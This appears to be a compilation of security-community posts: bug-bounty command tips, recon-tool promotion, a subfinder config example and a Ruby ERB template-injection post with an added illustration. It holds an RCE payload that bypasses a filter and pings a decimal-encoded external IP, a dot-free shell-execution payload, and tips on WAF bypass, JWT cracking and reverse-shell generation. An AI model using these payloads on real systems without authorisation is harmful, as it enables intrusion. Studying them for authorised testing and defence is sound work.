Wiseep is a hybrid-perspective vulnerability scanning solution. It starts with a reasonable scanning fee, and you only pay beyond that if a vulnerability exists.
Here's a cool trick for y'all looking to create new Nuclei templates for exploitable CVEs!
Using CVEmap you can get a list of CVEs that have public proofs of concept, that have been marked as exploited by CISA (KEV), that are remotely exploitable AND that don't have a Nuclei template (yet)!
Flags:
-k / -kev: marked as known exploited vulnerabilities by CISA
-t=false / -template=false: has no public Nuclei template
-poc: has a publicly published PoC
-re / -remote: is remotely exploitable
Good luck! 🤞
#nuclei #hacking #pentesting #bugbounty #CVEmap
We welcome the recent decisions by the UK, Canada, Australia, Portugal, France, Malta, and Luxembourg to recognize Palestine as a free state.
We also send our heartfelt greetings to all peace supporters. This is one of them, from Sydney Harbour Bridge🙏
JShunter
JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. It specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug bounty hunters and security researchers.
https://t.co/Wdhk76wkVB
👻👻👻Nuclei AI Prompts for @pdnuclei
Nuclei v3.3.9 (@pdiscoveryio) has an -ai option to generate and run nuclei templates on the fly from natural language.
This is a list of prompts for this option:
- sensitive data exposure
- SQLi
- XSS
- SSRF
✅Join Telegram- https://t.co/hbAZWP8v0p
✅https://t.co/FDEsNv1oud
#cybersecurity #bugbounty #bugbountytips
Are you using subfinder wrong?
Most people using it just stick to the default sources, but did you know you can supercharge it with API keys for the paid and rate-limited sources?
Available sources:
✅ alienvault
✅ anubis
✅ bevigil
✅ binaryedge
✅ bufferover
✅ c99
✅ censys
✅ certspotter
✅ chaos
✅ chinaz
✅ commoncrawl
✅ crtsh
✅ digitorus
✅ dnsdb
✅ dnsdumpster
✅ dnsrepo
✅ fofa
✅ fullhunt
✅ github
✅ hackertarget
✅ hunter
✅ intelx
✅ netlas
✅ leakix
✅ quake
✅ rapiddns
✅ redhuntlabs
✅ robtex
✅ securitytrails
✅ shodan
✅ sitedossier
✅ threatbook
✅ threatcrowd
✅ virustotal
✅ waybackarchive
✅ whoisxmlapi
✅ zoomeyeapi
✅ facebook
✅ builtwith
✅ hudsonrock
✅ digitalyama
Just add your API keys to the provider-config.yaml file and start finding more subdomains today!
#cybersecurity #hacking #bugbounty #infosec #pentesting
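As an added example of the file the post refers to (this is not taken from the subfinder project; every key value below is a placeholder you replace with your own): provider-config.yaml maps each source name to a list of keys, and sources that need a key pair take it as a single `id:secret` string (censys is the documented case). Several keys for one source are rotated, which helps with per-key rate limits.

```yaml
# $HOME/.config/subfinder/provider-config.yaml  (constructed example, placeholder keys)
# One source name per top-level key; each value is a list of credentials.
shodan:
  - SHODAN_API_KEY_PLACEHOLDER
securitytrails:
  - SECURITYTRAILS_API_KEY_PLACEHOLDER
virustotal:
  - VT_API_KEY_PLACEHOLDER_1
  - VT_API_KEY_PLACEHOLDER_2      # multiple keys are rotated across requests
chaos:
  - CHAOS_API_KEY_PLACEHOLDER
github:
  - GITHUB_TOKEN_PLACEHOLDER
censys:
  - CENSYS_API_ID_PLACEHOLDER:CENSYS_API_SECRET_PLACEHOLDER   # id:secret pair
```

Check it with `subfinder -ls`, which lists every source and marks the ones that need a key, then run `subfinder -d example.com -all` (or `-s shodan,censys` to target specific sources). A key that is wrong or expired is reported as a source error in verbose output (`-v`) rather than silently returning nothing, so run once with `-v` after editing the file. Keep the file mode at 0600: it holds live credentials for paid services.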
80 Bug bounty tips for my lovely dovely fam <3
1️⃣ Use sqlmap --risk=3 --level=5 for aggressive SQLi testing.
2️⃣ Automate XSS hunting with dalfox url https://t.co/DAXb48PfCx -b https://t.co/KpprP9d0F4 🚀
3️⃣ Check for subdomain takeovers with subzy run --targets subdomains.txt
4️⃣ Use amass enum -passive -d https://t.co/DAXb48PfCx for deep subdomain recon 🌎
5️⃣ Bypass WAFs with ffuf -w payloads.txt -u https://t.co/7zoC5kaeTf -H "X-Originating-IP: 127.0.0.1"
6️⃣ Automate JWT cracking with jwt_tool "$(cat token.jwt)" -C -d rockyou.txt 🔑
7️⃣ Scan GraphQL endpoints with GraphQLmap -u https://t.co/O6xxLxef3c 🛠
8️⃣ Bruteforce hidden directories with dirsearch -u https://t.co/bk7AB2mewQ -e php,html,js
9️⃣ Find misconfigured S3 buckets with aws s3 ls s3://bucket-name/ --no-sign-request ☁
🔟 Bypass SSRF restrictions by resolving DNS using Burp Collaborator
1️⃣1️⃣ Check for open redirects with qsreplace 'https://t.co/Feek7AqOIU' | httpx -silent 🔄
1️⃣2️⃣ Use subfinder -d https://t.co/DAXb48PfCx | httpx -silent to filter live subdomains 🏠
1️⃣3️⃣ Hunt for leaked API keys with truffleHog --regex --entropy=True 🔑
1️⃣4️⃣ Automate CORS misconfig detection with Corsy -u https://t.co/bk7AB2mewQ
1️⃣5️⃣ Enumerate subdomains via https://t.co/qyWccMfUKW with curl "https://t.co/lDgz1W8lkS"
1️⃣6️⃣ Scan for open ports with nmap -p- -T4 -A https://t.co/DAXb48PfCx 🔍
1️⃣7️⃣ Find webhooks & exposed APIs with gf webhook | httpx -silent
1️⃣8️⃣ Automate CSRF token stealing with Burp Suite Autorize Plugin
1️⃣9️⃣ Extract secrets from .git with git-dumper https://t.co/D1nhYlN1AS /output-dir 🕵️♂️
2️⃣0️⃣ Scan for JWT weak secrets with jwtcrack -t token.jwt -w rockyou.txt
2️⃣1️⃣ Fuzz POST parameters with ffuf -X POST -d "param=FUZZ" -w payloads.txt -u https://t.co/DAXb48PfCx
2️⃣2️⃣ Automate broken authentication checks with nuclei -t cves/ -l targets.txt 🔓
2️⃣3️⃣ Automate IDOR checks with ParamSpider -d https://t.co/DAXb48PfCx 🕸
2️⃣4️⃣ Search for AWS credentials with rg -e "AKIA[A-Z0-9]{16}" .
2️⃣5️⃣ Bypass CSP with JSONP endpoints using jsonp-hunter -u https://t.co/DAXb48PfCx
2️⃣6️⃣ Check for template injection with tplmap -u https://t.co/bk7AB2mewQ -p param 🛠
2️⃣7️⃣ Hunt for subdomain takeovers using subjack -w subdomains.txt -t 50 -o results.txt
2️⃣8️⃣ Automate WebSocket testing with wssip -u wss://target.com 🔌
2️⃣9️⃣ Scan for vulnerable third-party libraries with Retire.js 🔥
3️⃣0️⃣ Extract exposed API keys from JavaScript with linkfinder -i target.js
3️⃣1️⃣ Test for Host header attacks using curl -H "Host: https://t.co/mo2GiPbqH0" https://t.co/bk7AB2mewQ
3️⃣2️⃣ Extract parameters from JS files using ParamSpider -d https://t.co/DAXb48PfCx
3️⃣3️⃣ Use xsstrike -u https://t.co/bk7AB2mewQ for automated XSS scanning 🛡
3️⃣4️⃣ Automate GraphQL security scanning with InQL Scanner
3️⃣5️⃣ Automate API token brute-force with patator http_fuzz
3️⃣6️⃣ Scan for misconfigured Firebase databases with https://t.co/39cgWdaB6z https://t.co/DAXb48PfCx 🔥
3️⃣7️⃣ Use dnsx -l subdomains.txt -silent -a to resolve A records of subdomains
3️⃣8️⃣ Scan for HTTP smuggling vulnerabilities with https://t.co/VRu2DoFHcB -u https://t.co/bk7AB2mewQ
3️⃣9️⃣ Bruteforce JWT signing keys with crackjwt.py "$(cat token.jwt)" rockyou.txt 🔑
4️⃣0️⃣ Use hakrawler -url https://t.co/bk7AB2mewQ -depth 2 -plain to extract URLs
4️⃣1️⃣ Fuzz REST API endpoints with ffuf -u https://t.co/So7RZd79u3 -w wordlist.txt
4️⃣2️⃣ Test for blind XSS using https://t.co/5QfVyKDySq payloads
4️⃣3️⃣ Hunt for forgotten test endpoints with waybackurls https://t.co/DAXb48PfCx | gf test-endpoints
4️⃣4️⃣ Scan for HTTP/2 desync vulnerabilities with request-smuggler
4️⃣5️⃣ Find outdated WordPress plugins using wpscan --url https://t.co/bk7AB2mewQ
4️⃣6️⃣ Automate reverse shell generation using msfvenom 🎯
4️⃣7️⃣ Discover parameter pollution vulnerabilities with arjun -u https://t.co/bk7AB2mewQ
4️⃣8️⃣ Find misconfigured Open Redirects using OpenRedireX
4️⃣9️⃣ Scan for CSP weaknesses using csp-evaluator 🛡
5️⃣0️⃣ Find duplicate passwords in response bodies with gf passwords
5️⃣1️⃣ Bruteforce directories using feroxbuster -u https://t.co/bk7AB2mewQ -e -t 50
5️⃣2️⃣ Identify API vulnerabilities using nuclei -t nuclei-templates/api
5️⃣3️⃣ Scan for outdated dependencies with OWASP Dependency-Check
5️⃣4️⃣ Find JavaScript vulnerabilities with jsleak -u https://t.co/bk7AB2mewQ
5️⃣5️⃣ Automate hidden parameter detection using Parameth
5️⃣6️⃣ Scan for FTP misconfigurations using nmap -p 21 --script=ftp-anon https://t.co/DAXb48PfCx
5️⃣7️⃣ Enumerate usernames on WordPress with wpscan --url https://t.co/bk7AB2mewQ --enumerate u
5️⃣8️⃣ Automate XSS payload injection using XSStrike
5️⃣9️⃣ Detect leaked credentials in repositories using GitLeaks
6️⃣0️⃣ Scan for SSRF using Burp Suite Collaborator
6️⃣1️⃣ Enumerate login endpoints using waybackurls & gau
6️⃣2️⃣ Automate JWT attacks with jwt-pwn
6️⃣3️⃣ Hunt for forgotten admin panels with gobuster dir -u https://t.co/bk7AB2mewQ -w wordlist.txt
6️⃣4️⃣ Scan for WordPress misconfigurations with WPScan
6️⃣5️⃣ Automate GraphQL endpoint fuzzing with GraphQLmap
6️⃣6️⃣ Use dnsrecon -d https://t.co/DAXb48PfCx -t axfr to check for DNS zone transfers
6️⃣7️⃣ Find API token leaks in JavaScript using SecretFinder
6️⃣8️⃣ Bypass robots.txt restrictions with wget --mirror -e robots=off
6️⃣9️⃣ Test for LFI vulnerabilities using dotdotpwn
7️⃣0️⃣ Scan for API misconfigurations using Swagger Scanner
7️⃣1️⃣ Automate CSRF attack simulation using XSRFProbe
7️⃣2️⃣ Find hardcoded credentials using truffleHog
7️⃣3️⃣ Automate response time-based attacks using timing-attack
7️⃣4️⃣ Fuzz HTTP methods using metasploit auxiliary/scanner/http/http_methods
7️⃣5️⃣ Automate cookie poisoning attacks using Cookiemonster
7️⃣6️⃣ Extract sensitive data from memory dumps using volatility
7️⃣7️⃣ Bypass authentication using Burp Suite NoSQLMap
7️⃣8️⃣ Automate vulnerability detection with ProjectDiscovery Nuclei
7️⃣9️⃣ Scan for JavaScript key leaks using JSParser
8️⃣0️⃣ Hunt for vulnerable headers using Security Headers Scanner
🚀 Happy Hunting! 🎯💻 #BugBounty #CyberSecurity #EthicalHacking #Pentesting #Automation #BugHunting
Have you ever tried a pay-as-you-go model to get rid of vulnerabilities in your web apps, mobile apps, infrastructure, and more? There are also free scan options for certain types of assets.
Learn more:
https://t.co/9SrDcp6PYy
#infosec#cybersecurity#informationsecurity#CyberSec
Came across an SSTI in a Ruby ERB template and got blind RCE by bypassing the "." filter on the server using this payload: "<%25%3d system("ping 96312190") %25>". It might be useful; noting it down.
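As an added illustration of the post above (a constructed example, not the poster's target or code): a toy Ruby ERB render that applies the same kind of dot blacklist, the dot-free payload that slips past it, the dotted-to-decimal IP conversion that lets `ping 96312190` reach a host without a single "." in the request, and the hardened form that keeps user input out of the template source entirely. Function and template names are made up for this example.

```ruby
require "erb"

# Vulnerable pattern (constructed): user input is concatenated into the ERB
# template source, and the only "protection" is a blacklist on a literal ".".
def vulnerable_render(user_input)
  raise ArgumentError, "dots are not allowed" if user_input.include?(".")
  ERB.new("Hello #{user_input}").result(binding)   # input becomes Ruby code
end

# Hardened form: the template is fixed at author time and the user string is
# only ever data bound into it, so "<%= ... %>" inside it is never evaluated.
SAFE_TEMPLATE = ERB.new("Hello <%= name %>")
def safe_render(user_input)
  name = user_input
  SAFE_TEMPLATE.result(binding)
end

# "a.b.c.d" -> 32-bit integer. ping, curl and wget all accept this form, so a
# payload can name an attacker host without ever containing a ".".
def decimal_ip(dotted)
  dotted.split(".").map(&:to_i).reduce(0) { |acc, octet| (acc << 8) | octet }
end

# The poster's payload shape, with the out-of-band ping replaced by a harmless
# echo so the effect is visible in the rendered output.
DOTTED_PAYLOAD   = '<%= system("ping 5.189.155.126") %>'  # blocked by the dot filter
DOT_FREE_PAYLOAD = '<%= %x(echo 96312190) %>'             # passes it, runs a shell command

if __FILE__ == $0
  puts "5.189.155.126 as a decimal IP: #{decimal_ip('5.189.155.126')}"
  begin
    vulnerable_render(DOTTED_PAYLOAD)
  rescue ArgumentError => e
    puts "dotted payload: #{e.message}"
  end
  puts "dot-free payload rendered: #{vulnerable_render(DOT_FREE_PAYLOAD).inspect}"
  puts "same input through the safe renderer: #{safe_render(DOT_FREE_PAYLOAD).inspect}"
end
```

The takeaway is the one the post implies: a character blacklist in front of a template engine is not a control, because the attacker only needs an expression the engine will evaluate, and shell commands do not need dots to reach the outside world. The only durable fix is the `safe_render` shape: templates are code and must come from the codebase, never from the request.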